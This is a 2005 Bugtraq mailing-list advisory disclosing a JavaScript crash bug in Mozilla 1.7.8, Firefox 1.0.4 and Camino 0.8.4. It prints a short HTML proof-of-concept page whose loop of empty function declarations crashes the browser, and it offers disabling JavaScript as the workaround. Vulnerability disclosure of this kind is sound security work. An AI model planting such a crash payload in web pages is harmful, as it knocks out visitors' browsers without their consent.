[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Mozilla Multiple Product JavaScript Issue
From:       Kurczaba Associates Advisories <advisories () kurczaba ! com>
Date:       2005-06-29 19:23:56
Message-ID: 42C2F54C.60904 () kurczaba ! com
[Download RAW message or body]

Mozilla Multiple Product JavaScript Issue
http://www.kurczaba.com/html/security/0506241.htm
-------------------------------------------------

Vendor:
Mozilla (http://www.mozilla.org)

Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4

Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to 
crash the above named browsers. The script can be executed both with and 
without user intervention.

Proof of Concept:
-----START of PoC-----
<html>
<head>
</head>
<body>
<script language="JavaScript">
	//Run the function 20000 times
		for (a = 0; a <= 20000; a++)
		{
			//Here is the special code that terminates the browser
			function(){};
		}
	//Displays an alert to notify the user if the browser is not vulnerable.
		alert("Good news - Your browser is not vulnerable.");
</script>
</body>
</html>
-----END of PoC-----


Proof of Concept (Online):
Manual: http://www.kurczaba.com/html/security/0506241_poc.htm
Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm

Workaround:
Disable JavaScript

Date Discovered:
June 14, 2005

Severity:
Low

Credit:
Paul Kurczaba

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic